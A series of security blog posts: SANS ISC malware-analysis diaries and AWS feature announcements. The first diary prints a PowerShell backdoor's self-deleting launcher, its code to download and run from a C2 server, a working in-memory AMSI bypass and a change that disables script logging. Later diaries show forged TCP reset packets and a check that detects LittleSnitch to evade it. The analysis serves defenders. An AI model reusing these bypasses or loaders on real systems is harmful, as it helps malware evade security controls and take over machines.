Live Patching Windows API Calls Using PowerShell, (Wed, Nov 25th)

It's amazing how imaginative attackers can be when it comes to protecting themselves and preventing security controls from doing their job. Here is an example of a malicious PowerShell script that patches a DLL function live, in memory, to change the way it works (read: "to make it NOT work"). This is not a new technique, but it has been a while since I last encountered it, so it deserves a quick review.

The original script was spotted on VirusTotal (SHA256:b2598b28b19d0f7e705535a2779018ecf1b73954c065a3d721589490d068fb54)[1] with a nicely low detection score (3/60). The original file is interesting because it's a "bat" command-line script and a PowerShell script at the same time:

# 2>NUL & @CLS & PUSHD "%~dp0" & "%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -noProfile -ExecutionPolicy bypass "[IO.File]::ReadAllText('%~f0')|iex" & DEL "%~f0" & POPD /B

The environment variable '%~f0' will expand to the complete path of the script (e.g., "C:\Temp\malicious.bat"). It is passed to PowerShell, which will ignore the first line (starting with the '#'). The script will be deleted once PowerShell completes. Note that '%~dp0' will expand to the drive letter and path of that batch file.

The script itself is obfuscated inside a Base64-encoded string. First, it's a backdoor that tries to execute commands returned by the contacted C2 server. The HTTP connection is built in a specific way to talk to the server:

It requires a specific User-Agent:

$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$eBdd.HEadeRS.ADd('User-Agent',$u);

It tries to connect through the proxy configured in the system:

$EBdD.Proxy=[SYsTeM.NEt.WEBREqUeSt]::DeFAULtWEbProxY;
$ebdd.ProxY.CreDeNTIALS = [SyStEM.Net.CredeNTiAlCAche]::DeFauLTNETWoRKCreDeNtIalS;

A cookie is required:

$eBdd.HeAdErs.Add("Cookie","session=i9jI6+TRpy75U2v68M56EtGXOWE=");

The C2 address is obfuscated:

$ser=$([TEXT.EncoDing]::UNicODe.GEtSTrInG([ConvERT]::FRoMBAsE64STriNG('aAB0AHQAcAA6AC8ALwAzAC4AMQAyADgALgAxADAANwAuADcANAA6ADEANQA0ADMAMAA=')));
$t='/admin/get.php';
$daTa=$eBdD.DoWnLoadDaTA($seR+$T);

The C2 server is hxxp://3[.]128[.]107[.]74:15430/admin/get.php.

Data received from the C2 is decrypted and executed via Invoke-Expression (IEX), so we expect PowerShell code:

$K=[SysteM.TExt.EncOdiNG]::ASCII.GeTBytEs('827ccb0eea8a706c4c34a16891f84e7b');
$R={
    $D,$K=$ARgS;$S=0..255;0..255|%{
        $J=($J+$S[$_]+$K[$_%$K.CounT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;
        $H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];
        $_-bXOr$S[($S[$I]+$S[$H])%256]
    }
};

$Iv=$daTa[0..3];
$DAtA=$data[4..$DAtA.lenGtH];
-JoiN[CHAr[]](& $R $DatA ($IV+$K))|IEX
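
This routine is a plain RC4 implementation: the key is the 4-byte IV received from the server prepended to the hardcoded string '827ccb0eea8a706c4c34a16891f84e7b'. For analysts who capture the C2 traffic, the decryption is easy to reproduce outside PowerShell; here is a minimal Python sketch (the capture file name is hypothetical):

# Minimal RC4 re-implementation of the routine above (for offline analysis).
# 'c2_response.bin' is a hypothetical dump of the raw bytes returned by the C2.

def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                            # keystream generation + XOR
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

key_suffix = b"827ccb0eea8a706c4c34a16891f84e7b"   # hardcoded key from the script
blob = open("c2_response.bin", "rb").read()
plaintext = rc4(blob[:4] + key_suffix, blob[4:])   # the first 4 bytes are the IV
print(plaintext.decode("ascii", errors="replace"))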

But the most interesting part of the script is the technique implemented to prevent the PowerShell script from being blocked by the antivirus.

First, it tries to disable ScriptBlockLogging[2]:

$vaL=[CollECtionS.GEnErIC.DiCTIONarY[StrING,SysteM.ObjEct]]::nEW();
$Val.AdD('EnableScriptB'+'lockLogging',0);
$VAl.AdD('EnableScriptBlockInvocationLogging',0);
$b399['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$vaL

Then, it tries to disable the API call AmsiScanBuffer()[3] provided by amsi.dll. How? By patching the function and overwriting the beginning of its code with a simple return stub that disables the function:

$MethodDefinition = "
  [DllImport(`"kernel32`")]public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
  [DllImport(`"kernel32`")]public static extern IntPtr GetModuleHandle(string lpModuleName);
  [DllImport(`"kernel32`")]public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
";
$Kernel32 = Add-Type -MemberDefinition $MethodDefinition -Name 'Kernel32' -NameSpace 'Win32' -PassThru;
$ABSD = 'AmsiS'+'canBuffer';
$handle = [Win32.Kernel32]::GetModuleHandle('amsi.dll');
[IntPtr]$BufferAddress = [Win32.Kernel32]::GetProcAddress($handle, $ABSD);
[UInt32]$Size = 0x5;
[UInt32]$ProtectFlag = 0x40;
[UInt32]$OldProtectFlag = 0;
[Win32.Kernel32]::VirtualProtect($BufferAddress, $Size, $ProtectFlag, [Ref]$OldProtectFlag);
$buf = [Byte[]]([UInt32]0xB8,[UInt32]0x57, [UInt32]0x00, [Uint32]0x07, [Uint32]0x80, [Uint32]0xC3);
[system.runtime.interopservices.marshal]::copy($buf, 0, $BufferAddress, 6); 

Step 1: the script locates the address of the function AmsiScanBuffer() in memory. To achieve this, it uses the classic combination of GetModuleHandle() and GetProcAddress().

Step 2: the memory protection of the page where the function starts is changed to allow writing executable code (the key flag is 0x40, 'PAGE_EXECUTE_READWRITE').

Step 3: the memory location is overwritten with a buffer of six bytes: 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3.

This sequence of bytes disassembles to the following code:

0x0000000000000000:  B8 57 00 07 80    mov eax, 0x80070057
0x0000000000000005:  C3                ret 

The value 0x80070057 is placed into the EAX register (which holds the function's return value). This value is 'E_INVALIDARG'. Then, the function immediately returns to the caller with the 'ret' instruction. As a result, AmsiScanBuffer() never scans anything and the antivirus scan is bypassed…
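
For verification, the patch bytes can be run through a disassembler. A quick sketch with the Capstone Python bindings (assuming the capstone package is installed) reproduces the listing above:

from capstone import Cs, CS_ARCH_X86, CS_MODE_64

# The six bytes written over the beginning of AmsiScanBuffer()
patch = bytes([0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3])
md = Cs(CS_ARCH_X86, CS_MODE_64)
for insn in md.disasm(patch, 0):
    print("0x%016x: %-4s %s" % (insn.address, insn.mnemonic, insn.op_str))
# Expected output:
# 0x0000000000000000: mov  eax, 0x80070057
# 0x0000000000000005: ret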

As I said, this technique is not new and has already been discussed previously (around 2019), but it's interesting to see how attackers keep reusing good old techniques.

The fun part of the backdoor? I was not able to connect to it. The C2 seems to be an SSH server. Or did I miss something?

$ curl -v -A 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' -H 'Cookie: session=i9jI6+TRpy75U2v68M56EtGXOWE=' hxxp://3[.]128[.]107[.]74:15430/admin/get.php
*   Trying 3[.]128[.]107[.]74...
* TCP_NODELAY set
* Connected to 3[.]128[.]107[.]74 (3[.]128[.]107[.]74) port 15430 (#0)
> GET /admin/get.php HTTP/1.1
> Host: 3[.]128[.]107[.]74:15430
> User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
> Referer: http://www.google.com/search?hl=en&q=web&aq=f&oq=&aqi=g1
> Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
> Accept-Language: en-us
> Connection: Keep-Alive
> Cookie: session=i9jI6+TRpy75U2v68M56EtGXOWE=
>
SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6
Protocol mismatch.
* Closing connection 0

[1] https://www.virustotal.com/gui/file/b2598b28b19d0f7e705535a2779018ecf1b73954c065a3d721589490d068fb54/detection
[2] https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7.1
[3] https://docs.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanbuffer

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

The special case of TCP RST, (Tue, Nov 24th)

In TCP, packets with the "Reset" (RST or R) flag are sent to abort a connection. Probably the most common reason you are seeing them is that a SYN packet was sent to a closed port.

But RST packets may be sent in other cases to indicate that a connection should be closed. 

Let's first look at the reset in response to a SYN to a closed port:

IP (tos 0x0, ttl 64, id 0, offset 0, flags [none], proto TCP (6), length 64)
    192.0.2.1.65007 > 192.0.2.2.81: Flags [S], seq 3972116176, win 65535, options [mss 1460,nop,wscale 6,nop,nop,TS val 447631150 ecr 0,sackOK,eol], length 0
16:24:59.928936 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 40)
    192.0.2.2.81 > 192.0.2.1.65007: Flags [R.], seq 0, ack 3972116177, win 0, length 0

Interesting here: The sequence number of the RST packet is 0. If you are looking at "unusually frequent" sequence numbers, "0" may show up at the top if you had a lot of failed connections that resulted in resets.

For an RST in response to a SYN, the sequence number is not really used. This is the first packet arriving from that source, and no further packets will be sent. Also, there is nothing to acknowledge. So the sequence number, if there is one, would be ignored. As a result, the few operating systems I tested (BSD, macOS, Linux, Windows 10) all use a sequence number of 0.

Could this be used to help with spoofing TCP Resets? Not really. As there is no initial sequence number yet, the RST sequence number wouldn't add anything.
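
This is easy to verify with a quick packet-crafting sketch. The following scapy snippet (run with root privileges; the destination is a placeholder documentation address, replace it with a host you own) sends a SYN to a closed port and prints the flags, sequence, and acknowledgment numbers of the reply:

from scapy.all import IP, TCP, sr1

# Send a SYN to a (presumably closed) port and inspect the RST that comes back.
# 192.0.2.2 is a placeholder from the documentation range; use a host you control.
ans = sr1(IP(dst="192.0.2.2") / TCP(dport=81, flags="S"), timeout=2)
if ans is not None and ans.haslayer(TCP):
    t = ans[TCP]
    print("flags=%s seq=%d ack=%d" % (t.flags, t.seq, t.ack))   # expect flags=RA, seq=0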

A second issue that sometimes causes confusion: RST packets with payload

IP (tos 0x0, ttl 64, id 49111, offset 0, flags [DF], proto TCP (6), length 51)
    192.0.2.43.37444 > 10.0.28.20.25: Flags [R.], seq 1:12, ack 1, win 57352, length 11 [RST 220 mailgat]

The RST packet above has a payload length of 11 bytes. tcpdump is nice enough to display the payload with a "RST" prefix. The actual payload here was "220 mailgat". This behavior is typical for security devices (the trace above is a bit old, but I believe the RST was created by a Cisco IPS at the time). The idea is that the payload will provide more information about why the IPS (and in some cases firewall) sent the RST. Someone once told me that there is an RFC describing this behaviour, but I haven't found it yet (if you know: please comment 😉 ).
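
Such packets are also trivial to forge, which is one more reason not to trust the payload blindly. Here is a scapy sketch of an RST/ACK carrying the same text (addresses, ports, and sequence numbers are placeholders; sending raw packets requires root privileges):

from scapy.all import IP, TCP, Raw, send

# Forge a RST/ACK that carries an explanatory payload, as some IPS/firewall devices do.
rst = IP(src="10.0.28.20", dst="192.0.2.43") / \
      TCP(sport=25, dport=37444, flags="RA", seq=1, ack=1) / \
      Raw(load="220 mailgat")
send(rst, verbose=False)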


Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu
Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

New – Code Signing, a Trust and Integrity Control for AWS Lambda

Code signing is an industry standard technique used to confirm that the code is unaltered and from a trusted publisher. Code running inside AWS Lambda functions is executed on highly hardened systems and runs in a secure manner. However, function code is susceptible to alteration as it moves through deployment pipelines that run outside AWS.

Today, we are launching Code Signing for AWS Lambda. It is a trust and integrity control that helps administrators enforce that only signed code packages from trusted publishers run in their Lambda functions and that the code has not been altered since signing.

Code Signing for Lambda provides a first-class mechanism to enforce that only trusted code is deployed in Lambda. This frees organizations from the burden of building gatekeeper components in their deployment pipelines. Code Signing for AWS Lambda leverages AWS Signer, a fully managed code signing service from AWS. Administrators create a Signing Profile, a resource in AWS Signer that is used for creating signatures, and grant developers access to the signing profile using AWS Identity and Access Management (IAM). Within Lambda, administrators specify the allowed signing profiles using a new resource called Code Signing Configuration (CSC). A CSC enables organizations to implement a separation of duties between administrators and developers: administrators can use the CSC to set code signing policies on the functions, and developers can deploy code to the functions.

How to Create a Signing Profile
You can use the AWS Signer console to create a new Signing Profile. A signing profile can represent a group of trusted publishers and is analogous to the use of a digital signing certificate.

By clicking Create Signing Profile, you can create a Signing Profile that can be used to create signed code packages.

You can assign Signature validity period for the signatures generated by a Signing Profile between 1 day and 135 months.

How to create a Code Signing Configuration (CSC)
You can configure your functions to use Code Signing through the AWS Lambda console, Command-line Interface (CLI), or APIs by creating and attaching a new resource called Code Signing Configuration to the function. You can find Code signing configurations under Additional resources menu.

You can click Create configuration to define signing profiles that are allowed to sign code artifacts for this configuration, and set signature validation policy. To add an allowed signing profile, you can either select from the dropdown, which shows all signing profiles in your AWS account, or add a signing profile from a different account by specifying the version ARN.

Also, you can set the signature validation policy to either ‘Warn’ or ‘Enforce’. With ‘Warn’, Lambda logs a CloudWatch metric if there is a signature check failure but accepts the deployment. With ‘Enforce’, Lambda rejects the deployment if there is a signature check failure. The signature check fails if the signature's signing profile does not match one of the allowed signing profiles in the CSC, the signature is expired, or the signature is revoked. If the code package has been tampered with or altered since signing, the deployment is always rejected, irrespective of the signature validation policy.

You can also use the new Lambda API CreateCodeSigningConfig to create a CSC. You can see the JSON shape of a code signing configuration below.

{
    "CodeSigningConfigId": string,
    "CodeSigningConfigArn": string,
    "Description": string,
    "AllowedPublishers": {
        "SigningProfileVersionArns": [ string ]
    },
    "CodeSigningPolicies": {
        "UntrustedArtifactOnDeployment": string   // WARN or ENFORCE
    },
    "LastModified": string
}
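
The same configuration can be scripted. Here is a minimal boto3 sketch that creates a CSC and attaches it to a function; the signing profile version ARN and the function name are placeholders:

import boto3

lam = boto3.client("lambda")

# Create a Code Signing Configuration that only trusts one signing profile
# and rejects deployments that fail the signature check.
resp = lam.create_code_signing_config(
    Description="Only accept packages signed by the release profile",
    AllowedPublishers={
        "SigningProfileVersionArns": [
            # Placeholder ARN; use the version ARN of your own signing profile.
            "arn:aws:signer:us-east-1:123456789012:/signing-profiles/ReleaseProfile/abc123"
        ]
    },
    CodeSigningPolicies={"UntrustedArtifactOnDeployment": "Enforce"},
)
csc_arn = resp["CodeSigningConfig"]["CodeSigningConfigArn"]

# Attach the configuration to an existing function (the name is a placeholder).
lam.put_function_code_signing_config(
    CodeSigningConfigArn=csc_arn,
    FunctionName="my-signed-function",
)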

Let’s Enable Code Signing for Your Lambda Functions
To enable the Code Signing feature for your Lambda functions, you can select a function and click Edit in the Code signing configuration section.

Select one of the available CSCs and click the Save button.

Once your function is configured to use code signing, you need to upload a signed .zip file or provide the Amazon S3 URL of a signed .zip produced by a signing job in AWS Signer.

How to Create a Signed Code Package
Choose one of the allowed signing profiles and specify the S3 location of the code package ZIP file to be signed. Also, specify a destination path where the signed code package should be uploaded.

A signing job is an asynchronous process that generates a signature for your code package and puts the signed code package in the specified destination path.

Once the signing job has succeeded, you can find the signed ZIP packages in your assigned S3 bucket.

Back in the Lambda console, you can now publish the signed code package to the Lambda function. Lambda will perform signature checks to verify that the code has not been altered since signing and that the code is signed by one of the allowed signing profiles.

You can also enable code signing for a function using CreateFunction or PutFunctionCodeSigningConfig APIs by attaching a CSC to the function.

Developers can also use SAM CLI to sign code packages. They do this by specifying the signing profiles at package or deploy stage. SAM CLI automatically starts the signing workflow before deploying the code to Lambda.

Code Signing is also supported by Infrastructure as code tools like AWS CloudFormation and Terraform. Terraform also allows developers to sign code, in addition to declaring and creating code signing resources.

Now Available
Code Signing for AWS Lambda is available in all commercial regions except AWS China Regions, AWS GovCloud (US) Regions, and Asia Pacific (Osaka) Region. There is no additional charge for using code signing, and customers pay the standard price for Lambda functions.

To learn more about Code Signing for AWS Lambda and AWS Signer, please visit the Lambda developer guide and send us feedback either in the forum for AWS Lambda or through your usual AWS support contacts.

Channy;

New – Multi-Factor Authentication with WebAuthn for AWS SSO

Starting today, you can add WebAuthn as a new multi-factor authentication (MFA) option to AWS Single Sign-On, in addition to the currently supported one-time password (OTP) and RADIUS authenticators. By adding support for WebAuthn, a W3C specification developed in coordination with the FIDO Alliance, you can now authenticate with a wide variety of interoperable authenticators provisioned by your system administrator or built into your laptops or smartphones. For example, you can now tap a hardware security key, touch a fingerprint sensor on your Mac, or use facial recognition on your mobile device or PC to authenticate into the AWS Management Console or AWS Command Line Interface (CLI).

With this addition, you can now self-register multiple MFA authenticators. Doing so allows you to authenticate on AWS with another device in case you lose or misplace your primary authenticator device. We make it easy for you to name your devices for long-term manageability.

WebAuthn two-factor authentication is available for identities stored in the AWS Single Sign-On internal identity store and those stored in Microsoft Active Directory, whether it is managed by AWS or not.

What are WebAuthn and FIDO2?

Before exploring how to configure two-factor authentication using your FIDO2-enabled devices and looking at the user experience for web-based and CLI authentication, let's recap how FIDO2, WebAuthn, and the other specifications fit together.

FIDO2 is made of two core specifications: Web Authentication (WebAuthn) and Client To Authenticator Protocol (CTAP).

Web Authentication (WebAuthn) is a W3C standard that provides strong authentication based upon public key cryptography. Unlike traditional code generator tokens or apps using TOTP protocol, it does not require sharing a secret between the server and the client. Instead, it relies on a public key pair and digital signature of unique challenges. The private key never leaves a secured device, the FIDO-enabled authenticator. When you try to authenticate to a website, this secured device interacts with your browser using the CTAP protocol.

WebAuthn is strong: Authentication is ideally backed by a secure element, which can safely store private keys and perform the cryptographic operations. It is scoped: A key pair is only useful for a specific origin, like browser cookies. A key pair registered at console.amazonaws.com cannot be used at console.not-the-real-amazon.com, mitigating the threat of phishing. Finally, it is attested: Authenticators can provide a certificate that helps servers verify that the public key did in fact come from an authenticator they trust, and not a fraudulent source.

To start to use FIDO2 authentication, you therefore need three elements: a website that supports WebAuthn, a browser that supports WebAuthn and CTAP protocols, and a FIDO authenticator. Starting today, the SSO Management Console and CLI now support WebAuthn. All modern web browsers are compatible (Chrome, Edge, Firefox, and Safari). FIDO authenticators are either devices you can use from one device or another (roaming authenticators), such as a YubiKey, or built-in hardware supported by Android, iOS, iPadOS, Windows, Chrome OS, and macOS (platform authenticators).

How Does FIDO2 Work?
When I first register my FIDO-enabled authenticator on AWS SSO, the authenticator creates a new set of public key credentials that can be used to sign a challenge generated by the AWS SSO console (the relying party). The public part of these new credentials, along with the signed challenge, is stored by AWS SSO.

When I want to use WebAuthn as a second authentication factor, the AWS SSO console sends a challenge to my authenticator. The challenge is then signed with the private key of the previously registered credential and sent back to the console. This way, the AWS SSO console can verify the signature against the stored public key and confirm that I hold the required credential.
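
Conceptually, this is plain public-key challenge signing. The short sketch below (using the Python cryptography package; it illustrates the principle only, not the actual WebAuthn/CTAP message format) shows why the server only ever needs the public key:

import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec

# Registration: the authenticator generates a key pair and shares only the public part.
private_key = ec.generate_private_key(ec.SECP256R1())
public_key = private_key.public_key()            # stored by the relying party

# Authentication: the relying party sends a fresh challenge, the authenticator signs it.
challenge = os.urandom(32)
signature = private_key.sign(challenge, ec.ECDSA(hashes.SHA256()))

# Verification: raises InvalidSignature if the challenge was not signed by the holder
# of the private key.
public_key.verify(signature, challenge, ec.ECDSA(hashes.SHA256()))
print("signature verified")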

How Do I Enable MFA With a Secure Device in the AWS SSO Console?
You, the system administrator, can enable MFA for your AWS SSO workforce when the user profiles are stored in AWS SSO itself, or stored in your Active Directory, either self-managed or an AWS Directory Service for Microsoft Active Directory.

To let my workforce register their FIDO or U2F authenticator in self-service mode, I first navigate to Settings, click Configure under Multi-Factor Authentication. On the following screen, I make four changes. First, under Users should be prompted for MFA, I select Every time they sign in. Second, under Users can authenticate with these MFA types, I check Security Keys and built-in authenticators. Third, under If a user does not yet have a registered MFA device, I check Require them to register an MFA device at sign in. Finally, under Who can manage MFA devices, I check Users can add and manage their own MFA devices. I click on Save Changes to save and return.

Configure SSO 2

That’s it. Now your workforce is prompted to register their MFA device the next time they authenticate.

What Is the User Experience?
As an AWS console user, I authenticate on the AWS SSO portal page URL that I received from my System Administrator. I sign in using my user name and password, as usual. On the next screen, I am prompted to register my authenticator. I check Security Key as device type. To use a biometric factor such as fingerprints or face recognition, I would click Built-in authenticator.

Register MFA Device

The browser asks me to generate a key pair and to send my public key. I can do that just by touching a button on my device, or by providing the registered biometric, e.g. TouchID or FaceID.

Register a security key

The browser confirms and shows me a last screen where I have the possibility to give a friendly name to my device, so I can remember which one is which. Then I click Save and Done.

Confirm device registration

From now on, every time I sign in, I am prompted to touch my security device or use biometric authentication on my smartphone or laptop. What happens behind the scenes is the server sending a challenge to my browser. The browser sends the challenge to the security device. The security device uses my private key to sign the challenge and returns it to the server for verification. When the server validates the signature with my public key, I am granted access to the AWS Management Console.

Additional verification required

At any time, I can register additional devices and manage my registered devices. On the AWS SSO portal page, I click MFA devices on the top-right part of the screen.

MFA device management

I can see and manage the devices registered for my account, if any. I click Register device to register a new device.

How to Configure SSO for the AWS CLI?
Once my devices are configured, I can configure SSO on the AWS Command Line Interface (CLI).

I first configure CLI SSO with aws configure sso and I enter the SSO domain URL that I received from my system administrator. The CLI opens a browser where I can authenticate with my user name, password, and my second-factor authentication configured previously. The web console gives me a code that I enter back into the CLI prompt.

aws configure sso

When I have access to multiple AWS Accounts, the CLI lists them and I choose the one I want to use. This is a one-time configuration.

Once this is done, I can use the aws CLI as usual; the SSO authentication happens automatically behind the scenes. You are asked to re-authenticate from time to time, depending on the configuration set by your system administrator.

Available today
Just like AWS Single Sign-On, FIDO2 second-factor authentication is provided to you at no additional cost, and is available in all AWS Regions where AWS SSO is available.

As usual, we welcome your feedback. The team told me they are working on other features to offer you additional authentication options in the near future.

You can start to use FIDO2 as second factor authentication for AWS Single Sign-On today. Configure it now.

— seb

Quick Tip: Cobalt Strike Beacon Analysis, (Mon, Nov 23rd)

Several of our handlers, like Brad and Renato, have written diary entries about malware infections that involved the red team framework Cobalt Strike.

In this diary entry, I'll show you how you can quickly extract the configuration of Cobalt Strike beacons mentioned in these 2 diary entries:

  1. Hancitor infection with Pony, Evil Pony, Ursnif, and Cobalt Strike
  2. Attackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike

The configuration of a beacon is stored as an encoded table of type-length-value records. There are a couple of tools to analyze Cobalt Strike beacons, and I recently made my own tool 1768.py public.
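
As a generic illustration of what a type-length-value table looks like (this is not the exact Cobalt Strike record layout; use 1768.py or a similar tool on real samples), parsing such a structure boils down to a few lines:

import struct

def parse_tlv(blob: bytes):
    """Walk a simple TLV blob: 2-byte type, 2-byte length, then 'length' bytes of value."""
    records = []
    offset = 0
    while offset + 4 <= len(blob):
        rtype, rlen = struct.unpack_from(">HH", blob, offset)
        value = blob[offset + 4 : offset + 4 + rlen]
        records.append((rtype, value))
        offset += 4 + rlen
    return records

# Hand-made example blob: record type 1 holds a port (443), record type 2 holds a hostname.
blob = struct.pack(">HH", 1, 2) + struct.pack(">H", 443) + struct.pack(">HH", 2, 11) + b"example.com"
for rtype, value in parse_tlv(blob):
    print(rtype, value)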

The analysis of the sample that Brad mentioned in his diary entry (1) is simple:

In the screenshot above, you can see all the records of the decoded configuration of this sample. Records that you might be most interested in as an analyst are the server record, the port record, and the URLs used with GET and POST (highlighted in red).

In Renato's diary entry (2), there are 2 artifacts to analyze.

There's the shellcode: Renato explained how to deal with the different layers of obfuscation of this shellcode.

Here I use several of my tools to deobfuscate the shellcode, and then pass it on to my 1768.py tool:

The payload downloaded by this shellcode is easy to analyze:

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Quick Tip: Extracting all VBA Code from a Maldoc – JSON Format, (Sun, Nov 22nd)

In diary entry "Quick Tip: Extracting all VBA Code from a Maldoc" I explain which options to use with oledump.py to extract all VBA code with a single command.

I promised that I would update oledump.py so that it can also produce JSON output with all VBA code.

This is now done with version 0.0.55. The existing option -j (--json) produces a JSON object with the content (base64 encoded) of each stream found inside the analyzed ole file. Combining options -j and -v produces a JSON object with the VBA code (base64 encoded) of each module stream found inside the analyzed ole file:
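
Here is a quick sketch of how that JSON output could be post-processed to print the decoded VBA per module. Note that the 'items', 'name', and 'content' field names are assumptions on my part; check them against the actual output of your oledump.py version:

import base64
import json
import sys

# Read the JSON produced by "oledump.py -j -v maldoc.doc" from stdin and dump the
# decoded VBA code per module. The 'items', 'name' and 'content' keys are assumptions;
# adjust them to the structure actually emitted by your version of oledump.py.
data = json.load(sys.stdin)
for item in data.get("items", []):
    name = item.get("name", "?")
    vba = base64.b64decode(item.get("content", "")).decode("latin-1", errors="replace")
    print("=== %s ===" % name)
    print(vba)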

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Malicious Python Code and LittleSnitch Detection, (Fri, Nov 20th)

We all run plenty of security tools on our endpoints. Their goal is to protect us by preventing infection (or at least trying to). But all those security tools are present on our devices like normal applications and are, therefore, easy to detect. There are multiple techniques to detect the presence of such security tools:

  • Detecting processes
  • Detecting windows (via the title)
  • Detecting configuration (files or registry keys)
  • Detecting injected DLLs
  • Detecting debuggers

Those techniques remain the same on every operating system (with some deviations of course – the registry is specific to Windows). I found a malicious script targeting macOS computers which implements a very basic check to detect the presence of LittleSnitch[1]. This tool is very popular amongst Apple users. It detects and reports all attempts to connect to the Internet by applications (egress traffic). For malware, it's important to stay stealthy and the presence of LittleSnitch could reveal an attempt to connect to a C2 server.

I spotted a simple Python script (SHA256:e5eb6d879eaca9b29946a9e5b611d092e0cce3a9821f2b9e0ba206ac5b375f8b), part of a red-team exercise, that tries to detect the presence of LittleSnitch:

cmd = "ps -ef | grep Little Snitch | grep -v grep"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
out = ps.stdout.read()
ps.stdout.close()
if re.search("Little Snitch", out):
   sys.exit()

Simple but effective!
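
For completeness, the same check is easy to re-implement on Python 3 (this is my re-implementation for testing, not the original sample):

import subprocess
import sys

# Python 3 re-implementation of the check quoted above: list the running processes
# and bail out if Little Snitch appears in the output.
out = subprocess.run(["ps", "-ef"], capture_output=True, text=True).stdout
if "Little Snitch" in out:
    sys.exit()
print("Little Snitch not found, continuing...")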

[1] https://www.obdev.at/products/littlesnitch/index.html

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Multi-Region Replication Now Enabled for AWS Managed Microsoft Active Directory

Our customers build applications that need to serve users in all corners of the world. When we listen to our customers, they tell us that whilst they are comfortable building Active Directory (AD) aware applications on AWS, making them work globally can be a real challenge.

Customers told us that AWS Directory Service for Microsoft Active Directory had saved them time and money and provided them with all the capabilities they need to run their AD-aware applications. However, if they wanted to go global, they needed to create independent AWS Managed Microsoft AD directories per Region. They would then need to create a solution to synchronize data across each Region. This level of management overhead is significant, complex, and costly. It also slowed customers as they sought to migrate their AD-aware workloads to the cloud.

Today, I want to tell you about a new feature that allows customers to deploy a single AWS Managed Microsoft AD across multiple AWS Regions. This new feature, called multi-region replication, automatically configures inter-region networking connectivity, deploys domain controllers, and replicates all the Active Directory data across multiple Regions, ensuring that Windows and Linux workloads residing in those Regions can connect to and use AWS Managed Microsoft AD with low latency and high performance. AWS Managed Microsoft AD makes it more cost-effective for customers to migrate AD-aware applications and workloads to AWS and easier to operate them globally. In addition, automated multi-region replication provides multi-region resiliency.

AWS can now synchronize all customer directory data, including users, groups, Group Policy Objects (GPOs), and schema across multiple Regions. AWS handles automated software updates, monitoring, recovery, and the security of the underlying AD infrastructure across all Regions, enabling customers to focus on building their applications. Integrating with Amazon CloudWatch Logs and Amazon Simple Notification Service (SNS), AWS Managed Microsoft AD makes it easy for customers to monitor the directory’s health, and security logs globally.

How It Works 
Let me show you how to create an Active Directory that spans multiple Regions using the AWS Managed Microsoft AD console. You do not have to create a new directory to use multi-region replication; it will work on all your existing directories too.

First, I create a new Directory following the normal steps. I select Enterprise Edition since this is the only edition that supports multi-region replication.

I give my Directory a name and a description and then set an Admin password. I then click Next which takes me to the Networking setup.

I select an Amazon Virtual Private Cloud that I use for demos and then choose two subnets which are in separate Availability Zones. AWS Managed Microsoft AD deploys two domain controllers per Region and places them in separate subnets which are in different Availability Zones; this is done for resiliency reasons, so that the directory can still operate even if one of the Availability Zones has issues.

Once I click next, I am presented with the review screen and I click Create Directory.

The directory takes between 20 and 45 minutes to be created. There is now a Multi-Region column on the Directories listing page; for this directory, the value is currently set to No, indicating that it does not span multiple Regions.

Once the directory has been created, I click on the Directory ID and drill into the details. I now have a new section called Multi-Region replication and there is a button called Add Region. If I click this button I can then configure an additional Region.

I select the Region that I want to add to my directory, in this example US West (Oregon) us-west-2. I then select a VPC in that Region and two subnets that must reside in separate Availability Zones. Finally, I click the Add button to add this new Region for my directory.

Now, back on the directory details page, I see there are two Regions listed: one in US East (N. Virginia) and one in US West (Oregon). Again, the creation process can take up to 45 minutes, but once it has completed I will have my directory replicated across two Regions.
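
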